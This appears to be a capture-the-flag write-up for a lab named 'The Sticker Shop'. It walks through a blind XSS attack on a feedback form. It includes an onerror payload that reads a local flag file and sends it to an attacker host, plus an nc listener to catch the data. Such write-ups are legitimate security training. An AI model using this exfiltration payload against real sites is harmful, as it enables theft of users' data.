The Sticker Shop
Can you exploit the sticker shop in order to capture the flag?
Starting the task: we are going to face a server hosting a local sticker shop. I started the machine and jumped over to it.
The first step I took was to visit the website and look at the page source, where I found the /submit_feedback directory, which caught my attention.
I visited /submit_feedback and found a feedback submission form.
As soon as I saw this, I started trying random XSS payloads from payloadbox/xss-payload-list, and came to this payload:
```html
<img src=x onerror="fetch('<ip>:8080')"/>
```
[!NOTE] In the above payload the img tag refers to location x; since the src fails to load, the browser simply goes on to execute the onerror handler, and we can grab the resulting HTTP request with nc:
```javascript
fetch('http://<ip>:8080');
```
I just listened with nc for the request before submitting the payload, and yeah, like this!!!
```shell
nc -knvlp 8080
```
Now, to grab the flag, I used the following payload:
```html
<img src="x" onerror="fetch('http://127.0.0.1:8080/flag.txt').then(r => r.text()).then(r => fetch('http://<ip>:8080/?c=' + r)).catch(e => fetch('http://<ip>:8080/?c=' + e))"/>
```
[!NOTE] Components:
- `<img src="x" onerror="...">` - The image src is invalid, causing the onerror attribute to execute when the browser fails to load the image.
- `fetch('http://127.0.0.1:8080/flag.txt')` - This initiates an HTTP GET request to the victim's localhost on port 8080, targeting the flag.txt file.
- `.then(r => r.text())` - If the request succeeds, this processes the response (r) and converts it into text using the .text() method.
- `.then(r => fetch('http://<ip>:8080/?c=' + r))` - After retrieving the file content, another fetch request sends the content (r) to the attacker's server (http://<ip>:8080) as part of the query string (?c=...).
- `.catch(e => fetch('http://<ip>:8080/?c=' + e))` - If the initial fetch fails (e.g., the file doesn't exist or CORS blocks the request), the catch block handles the error and sends the error message (e) to the attacker's server.
Yes! Thank you for reading till here ;)